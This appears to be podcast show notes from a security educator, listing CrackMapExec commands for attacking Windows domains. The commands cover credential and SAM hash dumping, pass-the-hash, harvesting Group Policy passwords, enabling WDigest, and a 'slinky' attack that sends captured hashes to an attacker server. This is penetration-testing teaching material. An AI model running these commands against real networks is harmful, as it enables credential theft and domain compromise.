SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

# General enumeration to see if your account works, and where:
cme smb x.x.x.x -u username -p pass

# Check if print services are enabled:
cme smb x.x.x.x -u username -p pass -M spooler

# Check for the nopac vuln:
cme smb x.x.x.x -u username -p pass -M nopac

# Find GP passwords:
cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password

# Get list of targets with smb signing:
cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt

# Set wdigest flag:
cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable

# Dump creds/hashes:
cme smb x.x.x.x -u username -p pass -M lsassy

# Do pass the hash attacks
cme smb x.x.x.x -u username -H HASH

# Dump SAM database:
cme smb x.x.x.x -u username -p pass --sam

# Enumerate SMB shares
cme smb x.x.x.x -u username -p pass --shares

# Conduct slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

# Cleanup from slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=TRUE

Written by: Brian Johnson

Share on socials: